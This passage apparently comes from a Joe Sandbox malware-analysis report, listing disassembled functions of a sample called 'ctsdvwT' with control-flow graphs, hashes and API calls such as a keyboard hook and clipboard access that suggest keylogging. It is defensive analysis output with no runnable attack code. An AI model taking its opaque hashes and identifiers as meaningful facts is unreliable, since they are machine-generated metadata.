                                            • Instruction Fuzzy Hash: E5B18E70E102498FDF14CFADDA8179DBBF2AF88318F148529D858E7294EB749846CF81
                                            Function 01394820 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1206 1394820-13948ac 1209 13948ae-13948b9 1206->1209 1210 13948f6-13948f8 1206->1210 1209->1210 1212 13948bb-13948c7 1209->1212 1211 13948fa-1394912 1210->1211 1218 139495c-139495e 1211->1218 1219 1394914-139491f 1211->1219 1213 13948c9-13948d3 1212->1213 1214 13948ea-13948f4 1212->1214 1216 13948d5 1213->1216 1217 13948d7-13948e6 1213->1217 1214->1211 1216->1217 1217->1217 1220 13948e8 1217->1220 1222 1394960-13949a5 1218->1222 1219->1218 1221 1394921-139492d 1219->1221 1220->1214 1223 139492f-1394939 1221->1223 1224 1394950-139495a 1221->1224 1230 13949ab-13949b9 1222->1230 1225 139493b 1223->1225 1226 139493d-139494c 1223->1226 1224->1222 1225->1226 1226->1226 1228 139494e 1226->1228 1228->1224 1231 13949bb-13949c1 1230->1231 1232 13949c2-1394a1f 1230->1232 1231->1232 1239 1394a2f-1394a33 1232->1239 1240 1394a21-1394a25 1232->1240 1242 1394a43-1394a47 1239->1242 1243 1394a35-1394a39 1239->1243 1240->1239 1241 1394a27-1394a2a call 1390ab8 1240->1241 1241->1239 1246 1394a49-1394a4d 1242->1246 1247 1394a57-1394a5b 1242->1247 1243->1242 1245 1394a3b-1394a3e call 1390ab8 1243->1245 1245->1242 1246->1247 1249 1394a4f 1246->1249 1250 1394a6b 1247->1250 1251 1394a5d-1394a61 1247->1251 1249->1247 1253 1394a6c 1250->1253 1251->1250 1252 1394a63 1251->1252 1252->1250 1253->1253
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \V|l$\V|l
                                            • API String ID: 0-2952616358
                                            • Opcode ID: 870ae6b316aede5680461b0c2bce69102d9e6161c1ec04ae4c060bba60a777d8
                                            • Instruction ID: f205be2071fdc71a2b559e8577b369e639e1937317499f44a73601add30c0366
                                            • Opcode Fuzzy Hash: 870ae6b316aede5680461b0c2bce69102d9e6161c1ec04ae4c060bba60a777d8
                                            • Instruction Fuzzy Hash: 10718EB1E00349CFDF14CFADD98079EBBF2AF88318F148129E415AB254EB349846CB95
                                            Function 01394814 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1254 1394814-13948ac 1257 13948ae-13948b9 1254->1257 1258 13948f6-13948f8 1254->1258 1257->1258 1260 13948bb-13948c7 1257->1260 1259 13948fa-1394912 1258->1259 1266 139495c-139495e 1259->1266 1267 1394914-139491f 1259->1267 1261 13948c9-13948d3 1260->1261 1262 13948ea-13948f4 1260->1262 1264 13948d5 1261->1264 1265 13948d7-13948e6 1261->1265 1262->1259 1264->1265 1265->1265 1268 13948e8 1265->1268 1270 1394960-1394972 1266->1270 1267->1266 1269 1394921-139492d 1267->1269 1268->1262 1271 139492f-1394939 1269->1271 1272 1394950-139495a 1269->1272 1277 1394979-13949a5 1270->1277 1273 139493b 1271->1273 1274 139493d-139494c 1271->1274 1272->1270 1273->1274 1274->1274 1276 139494e 1274->1276 1276->1272 1278 13949ab-13949b9 1277->1278 1279 13949bb-13949c1 1278->1279 1280 13949c2-1394a1f 1278->1280 1279->1280 1287 1394a2f-1394a33 1280->1287 1288 1394a21-1394a25 1280->1288 1290 1394a43-1394a47 1287->1290 1291 1394a35-1394a39 1287->1291 1288->1287 1289 1394a27-1394a2a call 1390ab8 1288->1289 1289->1287 1294 1394a49-1394a4d 1290->1294 1295 1394a57-1394a5b 1290->1295 1291->1290 1293 1394a3b-1394a3e call 1390ab8 1291->1293 1293->1290 1294->1295 1297 1394a4f 1294->1297 1298 1394a6b 1295->1298 1299 1394a5d-1394a61 1295->1299 1297->1295 1301 1394a6c 1298->1301 1299->1298 1300 1394a63 1299->1300 1300->1298 1301->1301
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \V|l$\V|l
                                            • API String ID: 0-2952616358
                                            • Opcode ID: 5fb78871d9736dd4d327ef5e660cbbc6d2c5789a12286dbd42e8e9f2a944b26c
                                            • Instruction ID: d860be39c426a4d707d15c83ee53d9f287414ff2ce6b2eb4e3cb9052014d1970
                                            • Opcode Fuzzy Hash: 5fb78871d9736dd4d327ef5e660cbbc6d2c5789a12286dbd42e8e9f2a944b26c
                                            • Instruction Fuzzy Hash: B4717EB1E002499FDF10CFA8D9857DEBFF1AF88318F148129E419AB254EB349846CB95
                                            Function 06398993 Relevance: 1.6, APIs: 1, Instructions: 133COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1442 6398993-6398994 1443 6398921-6398945 1442->1443 1444 6398996-63989fe 1442->1444 1445 6398a09-6398a10 1444->1445 1446 6398a00-6398a06 1444->1446 1447 6398a1b-6398a53 1445->1447 1448 6398a12-6398a18 1445->1448 1446->1445 1450 6398a5b-6398aba CreateWindowExW 1447->1450 1448->1447 1451 6398abc-6398ac2 1450->1451 1452 6398ac3-6398afb 1450->1452 1451->1452 1456 6398b08 1452->1456 1457 6398afd-6398b00 1452->1457 1458 6398b09 1456->1458 1457->1456 1458->1458
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06398AAA
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4146687096.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_6390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: 379da3afaa54526ec2716f21a34aae4bad83d9d92f40d31b60c272a21859cf57
                                            • Instruction ID: 0fd04c32b3dc3390d25f583e507283aad62ed5511cc36fc684ca5f44c7c3c1ba
                                            • Opcode Fuzzy Hash: 379da3afaa54526ec2716f21a34aae4bad83d9d92f40d31b60c272a21859cf57
                                            • Instruction Fuzzy Hash: C85123B0C04349AFDF15CFA9C880ACEBFB5BF49300F24856AE458AB251D7749885CF91
                                            Function 06398998 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1459 6398998-63989fe 1460 6398a09-6398a10 1459->1460 1461 6398a00-6398a06 1459->1461 1462 6398a1b-6398aba CreateWindowExW 1460->1462 1463 6398a12-6398a18 1460->1463 1461->1460 1465 6398abc-6398ac2 1462->1465 1466 6398ac3-6398afb 1462->1466 1463->1462 1465->1466 1470 6398b08 1466->1470 1471 6398afd-6398b00 1466->1471 1472 6398b09 1470->1472 1471->1470 1472->1472
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06398AAA
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4146687096.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_6390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: bab7f0773c6b4d7b2e95eb2e1bf2f9a31db833b10fe52c84e214a7de455bc7e3
                                            • Instruction ID: 3d21ce65d73b019081a115ebf46dacb38fa942dede1b65569acca1730381aa95
                                            • Opcode Fuzzy Hash: bab7f0773c6b4d7b2e95eb2e1bf2f9a31db833b10fe52c84e214a7de455bc7e3
                                            • Instruction Fuzzy Hash: 2441D0B1D003499FDF14CF9AC884ADEBBB5BF88310F24852AE818AB250D7719885CF91
                                            Function 0639C2AC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1473 639c2ac-639d5c4 1476 639d5ca-639d5cf 1473->1476 1477 639d674-639d694 call 6396c44 1473->1477 1478 639d5d1-639d608 1476->1478 1479 639d622-639d65a CallWindowProcW 1476->1479 1486 639d697-639d6a4 1477->1486 1487 639d60a-639d610 1478->1487 1488 639d611-639d620 1478->1488 1481 639d65c-639d662 1479->1481 1482 639d663-639d672 1479->1482 1481->1482 1482->1486 1487->1488 1488->1486
                                            APIs
                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 0639D649
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4146687096.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_6390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CallProcWindow
                                            • String ID:
                                            • API String ID: 2714655100-0
                                            • Opcode ID: b3a8d9c9c5bbfba5236c6a43a3d366478c7c5ebd2cdbfdaee21d48b8b59a7060
                                            • Instruction ID: 3a1e0ceb11378943c4f3cebc3e820a6f52632a6a8371df9a989f9bc48454019e
                                            • Opcode Fuzzy Hash: b3a8d9c9c5bbfba5236c6a43a3d366478c7c5ebd2cdbfdaee21d48b8b59a7060
                                            • Instruction Fuzzy Hash: 7F4115B4A007498FDB54CF99C889AAAFBF5FF88314F248459D519AB321D334A845CFA0
                                            Function 0639E2CC Relevance: 1.6, APIs: 1, Instructions: 79comclipboardCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1491 639e2cc-639e328 1493 639e332-639e370 OleGetClipboard 1491->1493 1494 639e379-639e3c7 1493->1494 1495 639e372-639e378 1493->1495 1500 639e3c9-639e3cd 1494->1500 1501 639e3d7 1494->1501 1495->1494 1500->1501 1502 639e3cf 1500->1502 1503 639e3d8 1501->1503 1502->1501 1503->1503
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4146687096.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_6390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Clipboard
                                            • String ID:
                                            • API String ID: 220874293-0
                                            • Opcode ID: 4bdc642b89a239deee12e76edcd09b23ca26116b67134f65972b9e8d83b8ca38
                                            • Instruction ID: f084f5cf1eda73e2b58fe37ebd4149252ac6693baab1543d2579f360c5572eeb
                                            • Opcode Fuzzy Hash: 4bdc642b89a239deee12e76edcd09b23ca26116b67134f65972b9e8d83b8ca38
                                            • Instruction Fuzzy Hash: E53125B0D01249EFDB14CFA9C984BCEBBF5AF48304F248059E444BB2A4D7749885CFA5
                                            Function 0639DCC8 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1504 639dcc8-639e370 OleGetClipboard 1507 639e379-639e3c7 1504->1507 1508 639e372-639e378 1504->1508 1513 639e3c9-639e3cd 1507->1513 1514 639e3d7 1507->1514 1508->1507 1513->1514 1515 639e3cf 1513->1515 1516 639e3d8 1514->1516 1515->1514 1516->1516
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4146687096.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_6390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Clipboard
                                            • String ID:
                                            • API String ID: 220874293-0
                                            • Opcode ID: 97518e57889d0cc9dd0505e44834e3ac32d21792afedbd4e2bf599501f0b1bd3
                                            • Instruction ID: 10bbeac9d4def2924094800330e249c9ec3049b5aa1fc10b7dc0617adaa5edb2
                                            • Opcode Fuzzy Hash: 97518e57889d0cc9dd0505e44834e3ac32d21792afedbd4e2bf599501f0b1bd3
                                            • Instruction Fuzzy Hash: F83134B0D00209DFDB54CFA9C984BCEBBF5AF48304F208019E404BB2A0D7B59885CFA5
                                            Function 0639FE21 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1517 639fe21-639fe24 1518 639fe7a-639fe7c 1517->1518 1519 639fe26-639fe72 1517->1519 1521 639fe7e-639feb0 SetWindowsHookExA 1518->1521 1519->1521 1526 639fe74-639fe7c 1519->1526 1522 639feb9-639fed9 1521->1522 1523 639feb2-639feb8 1521->1523 1523->1522 1526->1521
                                            APIs
                                            • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,0639FC90,00000000,00000000), ref: 0639FEA3
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4146687096.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_6390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: HookWindows
                                            • String ID:
                                            • API String ID: 2559412058-0
                                            • Opcode ID: cd674a7cf38924f935379de223c54d23edde01537394e7bb18b6d0ceaeffbdca
                                            • Instruction ID: 28666b017c1f425d2022714063e11657333dac45eda0063dc10b23e5e9a65c80
                                            • Opcode Fuzzy Hash: cd674a7cf38924f935379de223c54d23edde01537394e7bb18b6d0ceaeffbdca
                                            • Instruction Fuzzy Hash: 852177B1D002498FCB14CFA9D884BEEFBF5EB48320F14841ED499A7251C774A945CFA1
                                            Function 0639C6F0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1529 639c6f0-639c78c DuplicateHandle 1530 639c78e-639c794 1529->1530 1531 639c795-639c7b2 1529->1531 1530->1531
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0639C77F
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4146687096.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_6390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 215a5ada55d1d0196984eae6d857ec7e99c2e757040a7a34f344ccbb157a5350
                                            • Instruction ID: c404403722905a30ade9e99fb653c457aae76b2c9cf7768238b1ef760a9206f1
                                            • Opcode Fuzzy Hash: 215a5ada55d1d0196984eae6d857ec7e99c2e757040a7a34f344ccbb157a5350
                                            • Instruction Fuzzy Hash: 3321E0B5D002599FDB10CFA9D984AEEBFF5EB48310F14801AE958A7250D374A945CFA4
                                            Function 0639C6F8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                            Download Yara Rule
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0639C77F
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4146687096.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_6390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: bb1af67e15d686793a866d6e1b74d409dc0e1f58e26fd8045028cf33226bacd2
                                            • Instruction ID: c57fb879907d5d82d0cef155d0ee91f20382df03e2b15acf1108ffe333835e6a
                                            • Opcode Fuzzy Hash: bb1af67e15d686793a866d6e1b74d409dc0e1f58e26fd8045028cf33226bacd2
                                            • Instruction Fuzzy Hash: 8921E0B59002589FDB10CFAAD984ADEBBF8EB48320F14801AE958A7210D374A944CFA5
                                            Function 0639EE20 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,0639FC90,00000000,00000000), ref: 0639FEA3
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4146687096.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_6390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: HookWindows
                                            • String ID:
                                            • API String ID: 2559412058-0
                                            • Opcode ID: 135216a51037c080a2a4ae22e192c088274f001a3973372380695593377fdef8
                                            • Instruction ID: d09b8b5e1cd3896999d1fb5d3be485e466e24449d0380f1b033219e7e4d20d6f
                                            • Opcode Fuzzy Hash: 135216a51037c080a2a4ae22e192c088274f001a3973372380695593377fdef8
                                            • Instruction Fuzzy Hash: 4D2133B5D002098FCB54CF9AC848BEEFBF4EB88320F10842EE458A7250C774A944CFA5
                                            Function 06395E54 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 06397956
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4146687096.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_6390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 194cc9605df8f4f6362b0e396bb1224c356f66a5d160e1a355be222074b8caf9
                                            • Instruction ID: e151bf884b6515acba9d5bd1de64baacf3f5cb1548e0db138488b426ad5b4bb1
                                            • Opcode Fuzzy Hash: 194cc9605df8f4f6362b0e396bb1224c356f66a5d160e1a355be222074b8caf9
                                            • Instruction Fuzzy Hash: C7113FB5C003498FCB20DF9AC844ADEFBF4EB88220F10802AD869B7340D375A549CFA5
                                            Function 063978EB Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 06397956
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4146687096.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_6390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 288e2c00582815bbca3271de19bb58c4836ff3bc80b1b2fd5a36bea88731363a
                                            • Instruction ID: 838c07e9455f4db59bde3fe781a81bb7f5fe2b05ffe18dfc3976d2b6e006e4c6
                                            • Opcode Fuzzy Hash: 288e2c00582815bbca3271de19bb58c4836ff3bc80b1b2fd5a36bea88731363a
                                            • Instruction Fuzzy Hash: C91102B5D007498FCB10DF9AC844ADEFBF4EB49220F10841AD869B7350D375A545CFA5
                                            Function 0639E189 Relevance: 1.5, APIs: 1, Instructions: 47comCOMMON
                                            Download Yara Rule
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 0639E1E5
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4146687096.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_6390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            • Opcode ID: c69a67b9d0c7ba5d446a4444987678fe4689c8e55936faf62fd7ab6adef02098
                                            • Instruction ID: 45729bb69658406298e74e48450a9c94d818dcb0ab9cd814ad24d52129f538b2
                                            • Opcode Fuzzy Hash: c69a67b9d0c7ba5d446a4444987678fe4689c8e55936faf62fd7ab6adef02098
                                            • Instruction Fuzzy Hash: 5D1125B49002498FCB20DFAAD448BCEFFF8EB48310F208459E458A7210C334A584CFA5
                                            Function 0639C304 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                            Download Yara Rule
                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,0639D89D), ref: 0639D927
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4146687096.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_6390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CallbackDispatcherUser
                                            • String ID:
                                            • API String ID: 2492992576-0
                                            • Opcode ID: 3900d7257e2cc09e99840309493f2d4c09eaaaa6d3e2ab47a8db9c5a7af620f6
                                            • Instruction ID: b90a421a3b162a1cc047d40c0725d01ffa51d253ee2fe468a126c7d58291db8b
                                            • Opcode Fuzzy Hash: 3900d7257e2cc09e99840309493f2d4c09eaaaa6d3e2ab47a8db9c5a7af620f6
                                            • Instruction Fuzzy Hash: 5B1133B5800748CFCB20DF9AD489BDEFBF4EB48320F20842AD558A7650C375A944CFA5
                                            Function 0639DBB0 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                            Download Yara Rule
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 0639E1E5
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4146687096.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_6390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            • Opcode ID: 19f59abe599d8cfcf3ac0764c75fd62d39bb8b0ae551f707b361f8d05c8743fd
                                            • Instruction ID: b6569cc2f845f8f80cfde61e9fef3972aaf4ae91b1f03ab6f69df16689b4bf6f
                                            • Opcode Fuzzy Hash: 19f59abe599d8cfcf3ac0764c75fd62d39bb8b0ae551f707b361f8d05c8743fd
                                            • Instruction Fuzzy Hash: CA1130B4900349CFCB20DF9AD448BDEBBF8EB48324F208419E959A7211C374A984CFE5
                                            Function 0639DBAD Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                            Download Yara Rule
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 0639E1E5
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4146687096.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_6390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            • Opcode ID: f1aac687cc0f8a9b822ac5fd3c68c88ad0a3900c24ef2482f655ac2260d89136
                                            • Instruction ID: f71af30111599a6292aa9b9a1b73542b28ea6c76543f047107feee28ea6a0416
                                            • Opcode Fuzzy Hash: f1aac687cc0f8a9b822ac5fd3c68c88ad0a3900c24ef2482f655ac2260d89136
                                            • Instruction Fuzzy Hash: EA1103B5900349CFDB20DF9AD948BDEBBF8EB48324F208419E559A7710C375A944CFA5
                                            Function 0639D8C0 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                            Download Yara Rule
                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,0639D89D), ref: 0639D927
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4146687096.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_6390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CallbackDispatcherUser
                                            • String ID:
                                            • API String ID: 2492992576-0
                                            • Opcode ID: b36897be693db1cb2b444597f7ed77a761328e9ba136fac176051cf9519af6a5
                                            • Instruction ID: 381c2737a571744f842003218d83543a345764b3166da458f487bc727d4a7057
                                            • Opcode Fuzzy Hash: b36897be693db1cb2b444597f7ed77a761328e9ba136fac176051cf9519af6a5
                                            • Instruction Fuzzy Hash: 3E1122B5800248DFCB20DF9AD945BDEBBF4EB48320F20841AD558A7210C374A944CFA5
                                            Function 01393E84 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \V|l
                                            • API String ID: 0-253765261
                                            • Opcode ID: d2559d8f941389d5917b5cb31ad60bcca72e1450da2932176a085e07ee770735
                                            • Instruction ID: 73d6cc21990d65a2bd5929caca7b5717a2cf3db3699f36e4e533bc6b625dd34b
                                            • Opcode Fuzzy Hash: d2559d8f941389d5917b5cb31ad60bcca72e1450da2932176a085e07ee770735
                                            • Instruction Fuzzy Hash: EF915DB0E0020ADFDF10CFA9DA857DEBBF1BF48318F148129E455A7254EB749886CB81
                                            Function 0139EEC5 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH^q
                                            • API String ID: 0-2549759414
                                            • Opcode ID: 7b256b07cd03b0979b09be1f71af07aceb9ff31f0de92610ad5caa2568cfbbdb
                                            • Instruction ID: e5614ffd32326acd3c420f1fc8efa38a5bd37b0c6e8ce3d48a398e641c7da09a
                                            • Opcode Fuzzy Hash: 7b256b07cd03b0979b09be1f71af07aceb9ff31f0de92610ad5caa2568cfbbdb
                                            • Instruction Fuzzy Hash: 7E31F230B002058FDF1AAB38C55426E7BE6AF89204F148879D407DB385EF39DC4ACBA1
                                            Function 0139EED8 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH^q
                                            • API String ID: 0-2549759414
                                            • Opcode ID: 2f55b3740bcdad95fcadaa5bc90d3adfaa32f687fa5a163b41fb395d0a6b9329
                                            • Instruction ID: a6ddcd8697ff3ed81254753113f55942510ffaebb683d1f53f586705f828226b
                                            • Opcode Fuzzy Hash: 2f55b3740bcdad95fcadaa5bc90d3adfaa32f687fa5a163b41fb395d0a6b9329
                                            • Instruction Fuzzy Hash: C631D0307002058FDF19AB38D56466E7BE6AF89604F108839E407DB385EF35DC46CBA1
                                            Function 013971F8 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR^q
                                            • API String ID: 0-2625958711
                                            • Opcode ID: bc4462e3703917bf20901e4dd185f149d500dcb7d35f2f3ccebf3b45d447b0b0
                                            • Instruction ID: b7f03c9c4710491ff0b2daf9a7b009411b14554ebe9cb354dbeb0977bf4b8d47
                                            • Opcode Fuzzy Hash: bc4462e3703917bf20901e4dd185f149d500dcb7d35f2f3ccebf3b45d447b0b0
                                            • Instruction Fuzzy Hash: AD317031E202099BDF25DFA9C48479EB7B2FF85308F208565F905EB281EB709842CF91
                                            Function 013971E8 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR^q
                                            • API String ID: 0-2625958711
                                            • Opcode ID: 957eb2ab44e3b71bd870396369174ba122c91decb6b4e6e2e58cf818928f5746
                                            • Instruction ID: c245c417118349ffd872330d352259944e3d5c50ed3d8aa5eb331a2e768de78b
                                            • Opcode Fuzzy Hash: 957eb2ab44e3b71bd870396369174ba122c91decb6b4e6e2e58cf818928f5746
                                            • Instruction Fuzzy Hash: 5E316131E202099BDF25DFA9C48479EB7B2FF85304F208569E905EB391EB7099418F91
                                            Function 01396BA9 Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
